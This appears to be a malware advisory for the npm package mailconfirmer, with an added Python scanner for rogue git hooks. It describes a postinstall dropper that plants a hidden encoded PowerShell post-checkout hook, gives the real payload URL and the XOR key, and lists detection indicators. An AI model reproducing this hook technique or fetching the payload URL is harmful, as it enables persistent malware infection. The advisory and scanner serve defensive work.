
MAL-2026-5750

Malicious code in mailconfirmer (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (fbadb3bfdda7f6b7d425f83f9d5007a59d92c19c75fee43181a471a5627fac7f)

The package advertises itself as an email confirmation/verification utility, but the shipped code contains no such functionality — index.js exports only a single getThemeColor function returning a color string. The real behavior is in install-hook.js, executed via the postinstall lifecycle script. It writes a `.git/hooks/post-checkout` hook into the installer's local repository whose contents are `powershell -NoP -NonI -W Hidden -Enc <base64>`. The base64 blob decodes to UTF-16LE PowerShell that downloads https://github.com/Dimitrijenco/Sticky_note/releases/download/v2/launcher.bin, XOR-decrypts the response with key 0x42, writes the result to %TEMP%\tmp.exe, executes it hidden via Start-Process -WindowStyle Hidden, sleeps, and deletes it. The dropper URL is hosted on an unrelated third-party GitHub account whose repository name (Sticky_note) is unrelated to the package's stated purpose. Two layers of obfuscation (base64-encoded UTF-16LE PowerShell + XOR-encrypted payload) are used to hide both the destination and the executed bytes. The persistence mechanism — a git post-checkout hook — re-triggers the download-and-execute path on every future `git checkout` in any repository where the package was installed, surviving package uninstall.
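Because the hook outlives an `npm uninstall`, a defender has to look in `.git/hooks` rather than in `node_modules`. The following scanner is an added example written for this advisory, not code from the package or from the source feed: it walks a repository's `.git/hooks`, finds encoded PowerShell launchers, decodes the base64 UTF-16LE command, and reports indicator strings matching the behavior described above. The sample hook is constructed; its decoded body is only a token fragment with a placeholder URL, not a working script.

```python
import base64
import re
from pathlib import Path

# Constructed sample: a post-checkout hook of the shape described in the
# advisory. The decoded "command" is just the indicator tokens, not runnable
# PowerShell, and the URL is a placeholder.
SAMPLE_PS = ('DownloadData("https://example.invalid/launcher.bin") -bxor 0x42 '
             'WriteAllBytes("$env:TEMP\\tmp.exe") Start-Process -WindowStyle Hidden')
SAMPLE_HOOK = ("#!/bin/sh\npowershell -NoP -NonI -W Hidden -Enc "
               + base64.b64encode(SAMPLE_PS.encode("utf-16le")).decode() + "\n")

# powershell ... -Enc/-EncodedCommand/-e/-ec <base64 blob>
ENC_RE = re.compile(
    r"powershell(?:\.exe)?\s[^\n]*?-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)

# Substrings (lower-cased) that together characterise the download-decrypt-execute pattern.
SUSPICIOUS = ("downloaddata", "downloadstring", "-bxor", "-windowstyle hidden",
              "start-process", "$env:temp", "frombase64string")

def decode_encoded_command(blob):
    """-Enc blobs are base64 over UTF-16LE text; return None if the blob is not that."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze_hook_text(text):
    """Return one finding per encoded PowerShell launcher found in a hook script."""
    findings = []
    for match in ENC_RE.finditer(text):
        decoded = decode_encoded_command(match.group(1))
        if decoded is None:
            findings.append({"decoded": None, "indicators": ["undecodable -Enc blob"]})
            continue
        low = decoded.lower()
        findings.append({"decoded": decoded, "indicators": [s for s in SUSPICIOUS if s in low]})
    return findings

def scan_repo_hooks(repo):
    """Map hook name -> findings for every non-sample file in <repo>/.git/hooks."""
    hooks_dir = Path(repo) / ".git" / "hooks"
    report = {}
    if not hooks_dir.is_dir():
        return report
    for hook in hooks_dir.iterdir():
        if hook.is_file() and not hook.name.endswith(".sample"):
            findings = analyze_hook_text(hook.read_text(errors="replace"))
            if findings:
                report[hook.name] = findings
    return report

if __name__ == "__main__":
    for finding in analyze_hook_text(SAMPLE_HOOK):
        print(finding["indicators"])
```

Run `scan_repo_hooks(".")` from each checkout that ever installed the package; a hit in `post-checkout` should be treated as an active persistence mechanism, not just a leftover file.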


Affected packages

npm / mailconfirmer

No fixed version published yet for mailconfirmer (npm). Pin to a known-safe version or switch to an alternative.
